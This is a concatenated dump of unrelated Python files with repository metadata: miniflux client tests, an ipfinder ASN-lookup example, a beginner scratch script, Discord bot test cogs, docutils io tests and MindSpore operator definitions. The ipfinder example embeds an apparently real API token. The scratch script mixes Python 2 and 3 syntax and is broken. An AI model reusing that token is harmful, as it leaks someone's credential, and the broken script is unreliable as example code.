response.json.return_value = expected_result
requests.get.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.get_entries(starred=False, after_entry_id=123)
requests.get.assert_called_once_with('http://localhost/v1/entries',
headers=None,
auth=('username', 'password'),
params={'after_entry_id': 123},
timeout=30)
assert result == expected_result
def test_get_user_by_id(self):
requests = _get_request_mock()
expected_result = []
response = mock.Mock()
response.status_code = 200
response.json.return_value = expected_result
requests.get.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.get_user_by_id(123)
requests.get.assert_called_once_with('http://localhost/v1/users/123',
headers=None,
auth=('username', 'password'),
timeout=30)
assert result == expected_result
def test_get_user_by_username(self):
requests = _get_request_mock()
expected_result = []
response = mock.Mock()
response.status_code = 200
response.json.return_value = expected_result
requests.get.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.get_user_by_username("foobar")
requests.get.assert_called_once_with('http://localhost/v1/users/foobar',
headers=None,
auth=('username', 'password'),
timeout=30)
assert result == expected_result
def test_update_user(self):
requests = _get_request_mock()
expected_result = {"id": 123, "theme": "Black", "language": "fr_FR"}
response = mock.Mock()
response.status_code = 201
response.json.return_value = expected_result
requests.put.return_value = response
client = miniflux.Client("http://localhost", "username", "password")
result = client.update_user(123, theme="black", language="fr_FR")
requests.put.assert_called_once_with('http://localhost/v1/users/123',
headers=None,
auth=('username', 'password'),
data=mock.ANY,
timeout=30)
_, kwargs = requests.put.call_args
payload = json.loads(kwargs.get('data'))
self.assertNotIn('username', payload)
self.assertNotIn('password', payload)
self.assertEqual(payload.get("theme"), "black")
self.assertEqual(payload.get("language"), "fr_FR")
self.assertEqual(result, expected_result)
    def test_timeout(self):
        # The 4th positional argument of Client (1.0 here) is forwarded as the
        # per-request timeout, and requests.exceptions.Timeout must propagate
        # to the caller instead of being swallowed by the client.
        requests = _get_request_mock()
        requests.get.side_effect = Timeout()
        client = miniflux.Client("http://localhost", "username", "password", 1.0)
        with self.assertRaises(Timeout):
            client.export()
        requests.get.assert_called_once_with('http://localhost/v1/export',
                                             headers=None,
                                             auth=('username', 'password'),
                                             timeout=1.0)
    def test_api_key_auth(self):
        # With api_key authentication the token is sent in the X-Auth-Token
        # header and HTTP basic auth is disabled (auth=None).
        # NOTE(review): this test expects timeout=30.0 while the basic-auth
        # tests above expect timeout=30; the asserts pass either way because
        # 30 == 30.0, but confirm the client uses a single default.
        requests = _get_request_mock()
        response = mock.Mock()
        response.status_code = 200
        response.json.return_value = {}
        requests.get.return_value = response
        client = miniflux.Client("http://localhost", api_key="secret")
        client.export()
        requests.get.assert_called_once_with('http://localhost/v1/export',
                                             headers={'X-Auth-Token': 'secret'},
                                             auth=None,
                                             timeout=30.0)
def _get_request_mock():
    """Patch the ``requests`` module used by miniflux and return the mock.

    NOTE(review): the patcher is started but never stopped, so the patch
    leaks into anything executed after the first call.  Confirm this is
    acceptable (every test in this module re-patches, which masks it).
    """
    patcher = mock.patch('miniflux.requests')
    return patcher.start()
| 38.657718 | 111 | 0.556597 |
949d5b3625477a080ea7c34ee2d46c24c2910746 | 147 | py | Python | examples/asn_lookup.py | ipfinder/ip-finder-python | 48ba093801d244c12a4583c138d62c94355baf28 | [
"Apache-2.0"
] | 8 | 2019-07-12T22:20:49.000Z | 2022-03-01T09:03:58.000Z | examples/asn_lookup.py | ipfinder/ip-finder-python | 48ba093801d244c12a4583c138d62c94355baf28 | [
"Apache-2.0"
] | 2 | 2019-08-29T23:24:57.000Z | 2021-02-01T15:15:16.000Z | examples/asn_lookup.py | ipfinder/ip-finder-python | 48ba093801d244c12a4583c138d62c94355baf28 | [
"Apache-2.0"
] | 5 | 2019-07-12T23:01:03.000Z | 2021-07-07T11:11:44.000Z | import ipfinder
con = ipfinder.config('f67f788f8a02a188ec84502e0dff066ed4413a85') # YOUR_TOKEN_GOES_HERE
asn = con.getAsn('as1')
print(asn.all)
| 18.375 | 88 | 0.795918 |
1e4b3540f29d86b723c6ed70db2f21a7e003c1cc | 1,067 | py | Python | temp.py | khanmbjob/python | 8f45db9f0b1e44c12a5ce308b87217d50b57578d | [
"BSD-2-Clause"
] | null | null | null | temp.py | khanmbjob/python | 8f45db9f0b1e44c12a5ce308b87217d50b57578d | [
"BSD-2-Clause"
] | null | null | null | temp.py | khanmbjob/python | 8f45db9f0b1e44c12a5ce308b87217d50b57578d | [
"BSD-2-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
import math
print("Hello World")
var1 = [1, 2, 3, 4]
var2 = True
# Create lists first and second
first = [11.25, 18.0, 20.0,9.50,9.50]
second = [10.75, 9.50]
# Paste together first and second: full
full = first + second
# Sort full in descending order: full_sorted
fully_sorted = sorted(full, reverse=False)
# Print out full_sorted
print(fully_sorted)
print("Maximum Value is :", max(fully_sorted))
print(len(fully_sorted))
mystring="hello world"
print(mystring.capitalize())
print(first.index(20.0))
print(first.count(9.50))
print(mystring.index("w"))
print(first.index(9.50))
first.append("My Element")
myint = 12
myresult = myint * math.pi
print(myresult)
count = 0
while (count < 9):
print('The count is:', count)
count = count + 1
print("Good bye!")
var = 1
while var == 1 : # This constructs an infinite loop
num = raw_input("Enter a number :")
print("You entered: ", num)
print"Good bye!"
| 17.783333 | 53 | 0.639175 |
cc12bac78eeeed068333b537ca5cd06dd194cb3a | 3,194 | py | Python | Tests/testCogs.py | Inkapa/discord-quiz-bot | c7e459b62f15bce649d0828c8b5d1e0a17610cc1 | [
"MIT"
] | null | null | null | Tests/testCogs.py | Inkapa/discord-quiz-bot | c7e459b62f15bce649d0828c8b5d1e0a17610cc1 | [
"MIT"
] | null | null | null | Tests/testCogs.py | Inkapa/discord-quiz-bot | c7e459b62f15bce649d0828c8b5d1e0a17610cc1 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Sat Jun 5 11:59:04 2021
@author: Liam
"""
from discord.ext import commands
import aiosqlite
import sqlite3
from database import Utilisateur, Quiz
class TestUtilisateur(commands.Cog):
    """Manual-test cog exercising the ``Utilisateur`` database model."""

    def __init__(self, client, sourceDb):
        # client: the discord bot instance; sourceDb: path to the sqlite file.
        self.client = client
        self.source = sourceDb

    @commands.command()
    async def initUser(self, ctx):
        """Fetch the invoking user from the database and echo its stats."""
        async with aiosqlite.connect(self.source) as db:
            # Row factory lets the model layer access columns by name.
            db.row_factory = sqlite3.Row
            user = await Utilisateur.get(ctx.author.id, db)
            name = await user.getName()
            idD = await user.getIdDiscord()
            score = await user.getScoreTotal()
            rep = len(await user.getReponses())
            quizs = len(await user.getQuizs())
            nbInst = await user.getNbParticipations()
            # The f-string keeps the source indentation inside the message;
            # presumably acceptable for a throwaway test cog.
            text = f"""
            Hey there {name}, your id is {idD}
            Your total score is {score} points
            You have {rep} responses and you have created {quizs} quizs
            You have participated to {nbInst} games
            """
            await ctx.send(text)

    @commands.command()
    async def leaderboard(self, ctx):
        """Send the full leaderboard as "name : score points" lines."""
        async with aiosqlite.connect(self.source) as db:
            db.row_factory = sqlite3.Row
            text = ""
            leader = await Utilisateur.getLeaderboard(db)
            for user in leader:
                text += await user.getName() + " : " + str(await user.getScoreTotal()) + " points\n"
            await ctx.send(text)

    @commands.command()
    async def addPoints(self, ctx):
        """Add 10 points to the invoking user and echo the new total."""
        async with aiosqlite.connect(self.source) as db:
            db.row_factory = sqlite3.Row
            user = await Utilisateur.get(ctx.author.id, db)
            await user.addPoints(10)
            await ctx.send(str(await user.getScoreTotal()) + " points")
class TestQuiz(commands.Cog):
    """Manual-test cog exercising the ``Quiz`` database model."""

    def __init__(self, client, sourceDb):
        # client: the discord bot instance; sourceDb: path to the sqlite file.
        self.client = client
        self.source = sourceDb

    @commands.command()
    async def createQuiz(self, ctx, titre, points):
        """Create a quiz owned by the invoker and echo quiz + creator stats.

        Note: the ``titre`` and ``points`` parameters are deliberately
        re-bound below to the values read back from the database.
        """
        async with aiosqlite.connect(self.source) as db:
            db.row_factory = sqlite3.Row
            quiz = await Quiz.create(titre, points, ctx.author.id, db)
            titre = await quiz.getTitre()
            quizId = await quiz.getIdQuiz()
            instanceCount = await quiz.getInstanceCount()
            points = await quiz.getPoints()
            text = f"""
            Quiz id: {quizId}
            Title: {titre}
            Number of instances: {instanceCount}
            Points: {points}
            """
            await ctx.send(text)
            user = await quiz.getCreator()
            name = await user.getName()
            idD = await user.getIdDiscord()
            score = await user.getScoreTotal()
            # NOTE(review): getReponses is called with an id argument here but
            # with no argument in TestUtilisateur.initUser -- confirm which
            # signature the model actually exposes.
            rep = len(await user.getReponses(ctx.author.id))
            quizs = len(await user.getQuizs())
            nbInst = await user.getNbParticipations()
            text = f"""
            Quiz creator: {name}, his id is {idD}
            His total score is {score} points
            He has {rep} responses and has created {quizs} quizs
            You have participated to {nbInst} games
            """
            await ctx.send(text)
c7ce5d3a2c86f696b67e93fc681015640a5d6b59 | 2,105 | py | Python | docs/build/docutils/test/test_io.py | mjtamlyn/django-braces | 8adc9bc4f5139e3d032d4e38657bf86413388b78 | [
"BSD-3-Clause"
] | 1 | 2015-03-22T16:49:07.000Z | 2015-03-22T16:49:07.000Z | docs/build/docutils/test/test_io.py | mjtamlyn/django-braces | 8adc9bc4f5139e3d032d4e38657bf86413388b78 | [
"BSD-3-Clause"
] | null | null | null | docs/build/docutils/test/test_io.py | mjtamlyn/django-braces | 8adc9bc4f5139e3d032d4e38657bf86413388b78 | [
"BSD-3-Clause"
] | null | null | null | #! /usr/bin/env python
# $Id: test_io.py 7037 2011-05-19 08:56:27Z milde $
# Author: Lea Wiemann <LeWiemann@gmail.com>
# Copyright: This module has been placed in the public domain.
"""
Test module for io.py.
"""
import unittest, sys
import DocutilsTestSupport # must be imported before docutils
from docutils import io
from docutils._compat import b, bytes
class InputTests(unittest.TestCase):
    """Tests for docutils.io input decoding: BOM stripping, coding-slug
    detection and BOM-based encoding detection.

    NOTE(review): ``assertEquals`` is a deprecated alias of ``assertEqual``;
    kept as-is because this file targets an old Python/docutils baseline.
    """

    def test_bom(self):
        # UTF-8 encoded bytes: BOM sequences must be removed on decode.
        input = io.StringInput(source=b('\xef\xbb\xbf foo \xef\xbb\xbf bar'),
                               encoding='utf8')
        # Assert BOMs are gone.
        self.assertEquals(input.read(), u' foo bar')
        # With unicode input:
        input = io.StringInput(source=u'\ufeff foo \ufeff bar')
        # Assert BOMs are still there.
        self.assertEquals(input.read(), u'\ufeff foo \ufeff bar')

    def test_coding_slug(self):
        # An Emacs-style "-*- coding: ... -*-" slug at the top selects the
        # decoder.
        input = io.StringInput(source=b("""\
.. -*- coding: ascii -*-
data
blah
"""))
        data = input.read()
        self.assertEquals(input.successful_encoding, 'ascii')
        # The slug may appear on the second line (after a shebang).
        input = io.StringInput(source=b("""\
#! python
# -*- coding: ascii -*-
print "hello world"
"""))
        data = input.read()
        self.assertEquals(input.successful_encoding, 'ascii')
        # A slug past the first two lines must be ignored.
        input = io.StringInput(source=b("""\
#! python
# extraneous comment; prevents coding slug from being read
# -*- coding: ascii -*-
print "hello world"
"""))
        data = input.read()
        self.assertNotEquals(input.successful_encoding, 'ascii')

    def test_bom_detection(self):
        # The leading BOM alone must be enough to identify each encoding.
        source = u'\ufeffdata\nblah\n'
        input = io.StringInput(source=source.encode('utf-16-be'))
        data = input.read()
        self.assertEquals(input.successful_encoding, 'utf-16-be')
        input = io.StringInput(source=source.encode('utf-16-le'))
        data = input.read()
        self.assertEquals(input.successful_encoding, 'utf-16-le')
        input = io.StringInput(source=source.encode('utf-8'))
        data = input.read()
        self.assertEquals(input.successful_encoding, 'utf-8')
if __name__ == '__main__':
unittest.main()
| 30.955882 | 77 | 0.633729 |
2e4fffcd486575a2b329c7c6afd78aef330f2295 | 29,550 | py | Python | mindspore/ops/operations/other_ops.py | Vincent34/mindspore | a39a60878a46e7e9cb02db788c0bca478f2fa6e5 | [
"Apache-2.0"
] | 1 | 2021-07-03T06:52:20.000Z | 2021-07-03T06:52:20.000Z | mindspore/ops/operations/other_ops.py | Vincent34/mindspore | a39a60878a46e7e9cb02db788c0bca478f2fa6e5 | [
"Apache-2.0"
] | null | null | null | mindspore/ops/operations/other_ops.py | Vincent34/mindspore | a39a60878a46e7e9cb02db788c0bca478f2fa6e5 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020-2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Other operators."""
import functools
from mindspore.common import monad
from mindspore.common._decorator import deprecated
from .. import signature as sig
from ..._checkparam import Validator as validator, Rel
from ...common import dtype as mstype
from ..primitive import Primitive, PrimitiveWithCheck, PrimitiveWithInfer, prim_attr_register
class Assign(Primitive):
    """
    Assigns `Parameter` with a value.

    Inputs of `variable` and `value` comply with the implicit type conversion rules to make the data types consistent.
    If they have different data types, lower priority data type will be converted to
    relatively highest priority data type.
    RuntimeError exception will be thrown when the data type conversion of Parameter is required.

    Inputs:
        - **variable** (Parameter) - The `Parameter`.
          :math:`(N,*)` where :math:`*` means ,any number of additional dimensions, its rank should less than 8.
        - **value** (Tensor) - The value to be assigned, has the same shape with `variable`.

    Outputs:
        Tensor, has the same data type and shape as original `variable`.

    Raises:
        TypeError: If `variable` is not a Parameter.
        TypeError: If `value` is not a Tensor.

    Supported Platforms:
        ``Ascend`` ``GPU`` ``CPU``

    Examples:
        >>> class Net(nn.Cell):
        ...     def __init__(self):
        ...         super(Net, self).__init__()
        ...         self.y = mindspore.Parameter(Tensor([1.0], mindspore.float32), name="y")
        ...
        ...     def construct(self, x):
        ...         ops.Assign()(self.y, x)
        ...         return self.y
        ...
        >>> x = Tensor([2.0], mindspore.float32)
        >>> net = Net()
        >>> output = net(x)
        >>> print(output)
        [2.]
    """
    # Signature: 'variable' is writable (RW_WRITE), 'value' must share its
    # dtype (T), and 'u' defaults to the universe monad token used for
    # side-effect ordering.
    __mindspore_signature__ = (
        sig.make_sig('variable', sig.sig_rw.RW_WRITE, dtype=sig.sig_dtype.T),
        sig.make_sig('value', dtype=sig.sig_dtype.T),
        sig.make_sig('u', default=monad.U, dtype=sig.sig_dtype.T1)
    )

    @prim_attr_register
    def __init__(self):
        """Initialize Assign."""
        self.init_prim_io_names(inputs=['ref', 'value'], outputs=['output'])
        # Assign mutates its first input in place; mark the primitive as
        # having a memory side effect so auto-monad keeps execution order.
        self.add_prim_attr('side_effect_mem', True)
class InplaceAssign(PrimitiveWithInfer):
    """
    Inplace assign `Parameter` with a value.

    This primitive can only use in graph kernel.

    InplaceAssign is deprecated from version 1.3 and will be removed in a future version, use Assign instead.

    Inputs:
        - **variable** (Parameter) - The `Parameter`.
        - **value** (Tensor) - The value to be assigned.
        - **depend** (Tensor) - The dependent tensor to keep this op connected in graph.

    Outputs:
        Tensor, has the same type as original `variable`.

    Raises:
        TypeError: If `value` or `depend` is not a Tensor.

    Examples:
        >>> class Net(nn.Cell):
        ...     def __init__(self):
        ...         super(Net, self).__init__()
        ...         self.inplace_assign = ops.InplaceAssign()
        ...
        ...     def construct(self, x):
        ...         val = x - 1.0
        ...         ret = x + 2.0
        ...         return self.inplace_assign(x, val, ret)
        ...
        >>> x = Tensor([2.0], mindspore.float32)
        >>> net = Net()
        >>> output = net(x)
        >>> print(output)
    """
    @deprecated("1.3", "Assign", False)
    @ prim_attr_register
    def __init__(self):
        """Initialize InplaceAssign."""
        self.init_prim_io_names(inputs=['x', 'y', 'z'], outputs=['output'])

    def infer_shape(self, x, y, z):
        # The output mirrors the `depend` input (z); x and y only feed the
        # in-place store and do not shape the result.
        return z

    def infer_dtype(self, x, y, z):
        # Same as infer_shape: output dtype comes from the `depend` input.
        return z
class Load(PrimitiveWithCheck):
    """
    Load `Parameter` to a value.

    Inputs:
        - **variable** (Parameter) - The `Parameter`.

    Outputs:
        Tensor - The loaded parameter tensor value.
    """
    # 'variable' is read-only here (RW_READ); 'u' is presumably the
    # universe-monad ordering token, matching Assign's signature above --
    # TODO confirm.
    __mindspore_signature__ = (
        sig.make_sig('variable', sig.sig_rw.RW_READ, dtype=sig.sig_dtype.T),
        sig.make_sig('u', dtype=sig.sig_dtype.T1)
    )

    @prim_attr_register
    def __init__(self):
        """Initialize Load."""
        self.init_prim_io_names(inputs=['ref', 'u'], outputs=['output'])

    def check_dtype(self, variable):
        # RefKey placeholders are exempt; any real input must carry a
        # numeric tensor dtype.
        if variable != mstype.type_refkey:
            validator.check_tensors_dtypes_same_and_valid({"variable": variable}, mstype.number_type, self.name)
class BoundingBoxEncode(PrimitiveWithInfer):
"""
Encodes bounding boxes locations.
Args:
means (tuple): Means for encoding bounding boxes calculation. Default: (0.0, 0.0, 0.0, 0.0).
stds (tuple): The standard deviations of deltas calculation. Default: (1.0, 1.0, 1.0, 1.0).
Inputs:
- **anchor_box** (Tensor) - Anchor boxes. The shape of anchor_box must be (n, 4).
- **groundtruth_box** (Tensor) - Ground truth boxes. Which has the same shape with anchor_box.
Outputs:
Tensor, encoded bounding boxes.
Raises:
TypeError: If `means` or `stds` is not a tuple.
TypeError: If `anchor_box` or `groundtruth_box` is not a Tensor.
Supported Platforms:
``Ascend`` ``GPU``
Examples:
>>> anchor_box = Tensor([[2, 2, 2, 3], [2, 2, 2, 3]], mindspore.float32)
>>> groundtruth_box = Tensor([[1, 2, 1, 4], [1, 2, 1, 4]], mindspore.float32)
>>> boundingbox_encode = ops.BoundingBoxEncode(means=(0.0, 0.0, 0.0, 0.0), stds=(1.0, 1.0, 1.0, 1.0))
>>> output = boundingbox_encode(anchor_box, groundtruth_box)
>>> print(output)
[[ -1. 0.25 0. 0.40551758]
[ -1. 0.25 0. 0.40551758]]
"""
@prim_attr_register
def __init__(self, means=(0.0, 0.0, 0.0, 0.0), stds=(1.0, 1.0, 1.0, 1.0)):
"""Initialize BoundingBoxEncode."""
validator.check_value_type('means', means, tuple, self.name)
validator.check_value_type('stds', stds, tuple, self.name)
for i, value in enumerate(means):
validator.check_value_type("means[%d]" % i, value, [float], self.name)
for i, value in enumerate(stds):
validator.check_value_type("stds[%d]" % i, value, [float], self.name)
validator.check_equal_int(len(means), 4, "means len", self.name)
validator.check_equal_int(len(stds), 4, "stds len", self.name)
def infer_shape(self, anchor_box, groundtruth_box):
validator.check('anchor_box shape[0]', anchor_box[0], 'groundtruth_box shape[0]', groundtruth_box[0], Rel.EQ,
self.name)
validator.check("anchor_box rank", len(anchor_box), "", 2, Rel.EQ, self.name)
validator.check("groundtruth_box rank", len(groundtruth_box), "", 2, Rel.EQ, self.name)
validator.check_equal_int(anchor_box[1], 4, 'anchor_box shape[1]', self.name)
validator.check_equal_int(groundtruth_box[1], 4, 'groundtruth_box shape[1]', self.name)
return anchor_box
    def infer_dtype(self, anchor_box, groundtruth_box):
        """Require both inputs to share one valid numeric dtype; that dtype is returned unchanged."""
        args = {"anchor_box": anchor_box, "groundtruth_box": groundtruth_box}
        validator.check_tensors_dtypes_same_and_valid(args, mstype.number_type, self.name)
        return anchor_box
class BoundingBoxDecode(PrimitiveWithInfer):
    """
    Decodes bounding boxes locations.
    Args:
        max_shape (tuple): The max size limit for decoding box calculation.
            May be None, in which case no length/shape check is applied here.
        means (tuple): The means of deltas calculation. Default: (0.0, 0.0, 0.0, 0.0).
        stds (tuple): The standard deviations of deltas calculation. Default: (1.0, 1.0, 1.0, 1.0).
        wh_ratio_clip (float): The limit of width and height ratio for decoding box calculation. Default: 0.016.
    Inputs:
        - **anchor_box** (Tensor) - Anchor boxes. The shape of `anchor_box` must be (n, 4).
        - **deltas** (Tensor) - Delta of boxes. Which has the same shape with `anchor_box`.
    Outputs:
        Tensor, decoded boxes.
    Raises:
        TypeError: If `means`, `stds` or `max_shape` is not a tuple.
        TypeError: If `wh_ratio_clip` is not a float.
        TypeError: If `anchor_box` or `deltas` is not a Tensor.
    Supported Platforms:
        ``Ascend`` ``GPU``
    Examples:
        >>> anchor_box = Tensor([[4, 1, 2, 1], [2, 2, 2, 3]], mindspore.float32)
        >>> deltas = Tensor([[3, 1, 2, 2], [1, 2, 1, 4]], mindspore.float32)
        >>> boundingbox_decode = ops.BoundingBoxDecode(means=(0.0, 0.0, 0.0, 0.0), stds=(1.0, 1.0, 1.0, 1.0),
        ...                                            max_shape=(768, 1280), wh_ratio_clip=0.016)
        >>> output = boundingbox_decode(anchor_box, deltas)
        >>> print(output)
        [[ 4.1953125  0.         0.         5.1953125]
         [ 2.140625   0.         3.859375  60.59375  ]]
    """
    @prim_attr_register
    def __init__(self, max_shape, means=(0.0, 0.0, 0.0, 0.0), stds=(1.0, 1.0, 1.0, 1.0), wh_ratio_clip=0.016):
        """Initialize BoundingBoxDecode."""
        # means/stds must be 4-element tuples of floats (one per coordinate).
        validator.check_value_type('means', means, tuple, self.name)
        validator.check_value_type('stds', stds, tuple, self.name)
        for i, value in enumerate(means):
            validator.check_value_type("means[%d]" % i, value, [float], self.name)
        for i, value in enumerate(stds):
            validator.check_value_type("stds[%d]" % i, value, [float], self.name)
        validator.check_value_type('wh_ratio_clip', wh_ratio_clip, [float], self.name)
        validator.check_equal_int(len(means), 4, "means len", self.name)
        validator.check_equal_int(len(stds), 4, "stds len", self.name)
        # max_shape is optional; when given it must be a (height, width) pair.
        if max_shape is not None:
            validator.check_value_type('max_shape', max_shape, [tuple], self.name)
            validator.check_equal_int(len(max_shape), 2, "max_shape len", self.name)
    def infer_shape(self, anchor_box, deltas):
        """Check both inputs are rank-2 (n, 4) with matching n; decoded boxes keep the anchor shape."""
        validator.check('anchor_box shape[0]', anchor_box[0], 'deltas shape[0]', deltas[0], Rel.EQ, self.name)
        validator.check("anchor_box rank", len(anchor_box), "", 2, Rel.EQ, self.name)
        validator.check("deltas rank", len(deltas), "", 2, Rel.EQ, self.name)
        validator.check_equal_int(anchor_box[1], 4, 'anchor_box shape[1]', self.name)
        validator.check_equal_int(deltas[1], 4, 'deltas shape[1]', self.name)
        return anchor_box
    def infer_dtype(self, anchor_box, deltas):
        """Require both inputs to share one valid numeric dtype; that dtype is returned unchanged."""
        args = {"anchor_box": anchor_box, "deltas": deltas}
        validator.check_tensors_dtypes_same_and_valid(args, mstype.number_type, self.name)
        return anchor_box
class CheckValid(PrimitiveWithInfer):
    """
    Checks bounding box.
    Checks whether the bounding box cross data and data border are valid.
    Inputs:
        - **bboxes** (Tensor) - Bounding boxes tensor with shape (N, 4). Data type must be float16 or float32.
        - **img_metas** (Tensor) - Raw image size information with the format of (height, width, ratio).
          Data type must be float16 or float32.
    Outputs:
        Tensor, with shape of (N,) and dtype of bool.
    Raises:
        TypeError: If `bboxes` or `img_metas` is not a Tensor.
        TypeError: If dtype of `bboxes` or `img_metas` is neither float16 nor float32.
    Supported Platforms:
        ``Ascend`` ``GPU``
    Examples:
        >>> import mindspore
        >>> import mindspore.nn as nn
        >>> import numpy as np
        >>> from mindspore import Tensor
        >>> from mindspore.ops import operations as ops
        >>> class Net(nn.Cell):
        ...     def __init__(self):
        ...         super(Net, self).__init__()
        ...         self.check_valid = ops.CheckValid()
        ...     def construct(self, x, y):
        ...         valid_result = self.check_valid(x, y)
        ...         return valid_result
        ...
        >>> bboxes = Tensor(np.linspace(0, 6, 12).reshape(3, 4), mindspore.float32)
        >>> img_metas = Tensor(np.array([2, 1, 3]), mindspore.float32)
        >>> net = Net()
        >>> output = net(bboxes, img_metas)
        >>> print(output)
        [ True False False]
    """
    @prim_attr_register
    def __init__(self):
        """Initialize CheckValid."""
        self.init_prim_io_names(inputs=['bboxes', 'img_metas'], outputs=['output'])
    def infer_shape(self, bboxes_shape, metas_shape):
        """Require bboxes (N, 4) and img_metas (3,); one bool per box, so the output shape is (N,)."""
        validator.check("bboxes rank", len(bboxes_shape), "", 2, Rel.EQ, self.name)
        validator.check("bboxes_shape[-1]", bboxes_shape[-1], "", 4, Rel.EQ, self.name)
        validator.check("img_metas rank", len(metas_shape), "", 1, Rel.EQ, self.name)
        validator.check("img_metas shape[0]", metas_shape[0], "", 3, Rel.EQ, self.name)
        return bboxes_shape[:-1]
    def infer_dtype(self, bboxes_type, metas_type):
        """Validate input dtypes; the result is always a bool tensor."""
        # NOTE(review): valid_type also admits int16 and uint8, although the
        # class docstring documents float16/float32 only -- confirm intended.
        valid_type = [mstype.float32, mstype.float16, mstype.int16, mstype.uint8]
        validator.check_tensor_dtype_valid("bboxes_type", bboxes_type, valid_type, self.name)
        validator.check_tensor_dtype_valid("metas_type", metas_type, valid_type, self.name)
        return mstype.bool_
class IOU(PrimitiveWithInfer):
    r"""
    Calculates intersection over union for boxes.
    Computes the intersection over union (IOU) or the intersection over foreground (IOF) based on the ground-truth and
    predicted regions.
    .. math::
        \text{IOU} = \frac{\text{Area of Overlap}}{\text{Area of Union}}
        \text{IOF} = \frac{\text{Area of Overlap}}{\text{Area of Ground Truth}}
    Args:
        mode (string): The mode is used to specify the calculation method,
            now supporting 'iou' (intersection over union) or 'iof'
            (intersection over foreground) mode. Default: 'iou'.
    Inputs:
        - **anchor_boxes** (Tensor) - Anchor boxes, tensor of shape (N, 4). "N" indicates the number of anchor boxes,
          and the value "4" refers to "x0", "y0", "x1", and "y1". Data type must be float16 or float32.
        - **gt_boxes** (Tensor) - Ground truth boxes, tensor of shape (M, 4). "M" indicates the number of ground
          truth boxes, and the value "4" refers to "x0", "y0", "x1", and "y1". Data type must be float16 or float32.
    Outputs:
        Tensor, the 'iou' values, tensor of shape (M, N), with the same data type as `anchor_boxes`.
    Raises:
        KeyError: When `mode` is not 'iou' or 'iof'.
    Supported Platforms:
        ``Ascend`` ``GPU`` ``CPU``
    Examples:
        >>> iou = ops.IOU()
        >>> anchor_boxes = Tensor(np.random.randint(1.0, 5.0, [3, 4]), mindspore.float16)
        >>> gt_boxes = Tensor(np.random.randint(1.0, 5.0, [3, 4]), mindspore.float16)
        >>> output = iou(anchor_boxes, gt_boxes)
        >>> print(output.shape)
        (3, 3)
    """
    @prim_attr_register
    def __init__(self, mode='iou'):
        """Initialize IOU."""
        # Only the two documented modes are accepted; anything else fails fast.
        if mode not in {'iou', 'iof'}:
            raise KeyError("Mode only support 'iou' or 'iof'.")
        self.init_prim_io_names(inputs=['anchor_boxes', 'gt_boxes'], outputs=['overlap'])
    def infer_shape(self, anchor_boxes, gt_boxes):
        """Require both inputs to be rank-2 (*, 4); the overlap matrix is (M, N) = (gt count, anchor count)."""
        validator.check_equal_int(gt_boxes[1], 4, 'gt_boxes shape[1]', self.name)
        validator.check_equal_int(anchor_boxes[1], 4, 'anchor_boxes shape[1]', self.name)
        validator.check_equal_int(len(anchor_boxes), 2, 'anchor_boxes rank', self.name)
        validator.check_equal_int(len(gt_boxes), 2, 'gt_boxes rank', self.name)
        iou = [gt_boxes[0], anchor_boxes[0]]
        return iou
    def infer_dtype(self, anchor_boxes, gt_boxes):
        """Both inputs must be float16/float32; the output shares the anchor dtype."""
        valid_type = [mstype.float32, mstype.float16]
        validator.check_tensor_dtype_valid("anchor_boxes", anchor_boxes, valid_type, self.name)
        validator.check_tensor_dtype_valid("gt_boxes", gt_boxes, valid_type, self.name)
        return anchor_boxes
class Partial(Primitive):
    """
    Makes a partial function instance, used for pynative mode.
    Inputs:
        - **args** (Union[FunctionType, Tensor]) - The function to bind,
          followed by the arguments to bind to it.
    Outputs:
        FunctionType, a partial function with the given arguments bound.
    """
    # Side effects propagate from the first argument to the return value.
    side_effect_propagate = 1
    @prim_attr_register
    def __init__(self):
        """Initialize Partial."""
        self.add_prim_attr('side_effect_propagate', 1)
    def __call__(self, *args):
        # args[0] is the callable; everything after it is bound positionally.
        target, *bound = args
        return functools.partial(target.__call__, *bound)
class Depend(Primitive):
    """
    Depend is used for processing dependency operations.
    In most scenarios, if operators have IO side effects or memory side effects,
    they will be executed according to the user's semantics. In some scenarios,
    if the two operators A and B have no order dependency, and A must be executed
    before B, we recommend using Depend to specify their execution order. The
    usage method is as follows::
        a = A(x)                --->        a = A(x)
        b = B(y)                --->        y = Depend(y, a)
                                --->        b = B(y)
    Inputs:
        - **value** (Tensor) - the real value to return for depend operator.
        - **expr** (Expression) - the expression to execute with no outputs.
    Outputs:
        Tensor, the value passed by last operator.
    Supported Platforms:
        ``Ascend`` ``GPU`` ``CPU``
    Examples:
        >>> import numpy as np
        >>> import mindspore
        >>> import mindspore.nn as nn
        >>> import mindspore.ops.operations as P
        >>> from mindspore import Tensor
        >>> class Net(nn.Cell):
        ...     def __init__(self):
        ...         super(Net, self).__init__()
        ...         self.softmax = P.Softmax()
        ...         self.depend = P.Depend()
        ...
        ...     def construct(self, x, y):
        ...         mul = x * y
        ...         y = self.depend(y, mul)
        ...         ret = self.softmax(y)
        ...         return ret
        ...
        >>> x = Tensor(np.ones([4, 5]), dtype=mindspore.float32)
        >>> y = Tensor(np.ones([4, 5]), dtype=mindspore.float32)
        >>> net = Net()
        >>> output = net(x, y)
        >>> print(output)
        [[0.2 0.2 0.2 0.2 0.2]
         [0.2 0.2 0.2 0.2 0.2]
         [0.2 0.2 0.2 0.2 0.2]
         [0.2 0.2 0.2 0.2 0.2]]
    """
    # Side effect will propagated from the first argument to return value.
    side_effect_propagate = 1
    @prim_attr_register
    def __init__(self):
        """Initialize Depend."""
        # Mirror the class-level flag as a primitive attribute so it is visible
        # on this instance.
        self.add_prim_attr('side_effect_propagate', 1)
    def __call__(self, value, expr):
        # At call time `expr` has already been evaluated by the caller; Depend
        # simply passes `value` through (the ordering constraint matters to the
        # graph compiler, presumably -- not to this pynative fast path).
        return value
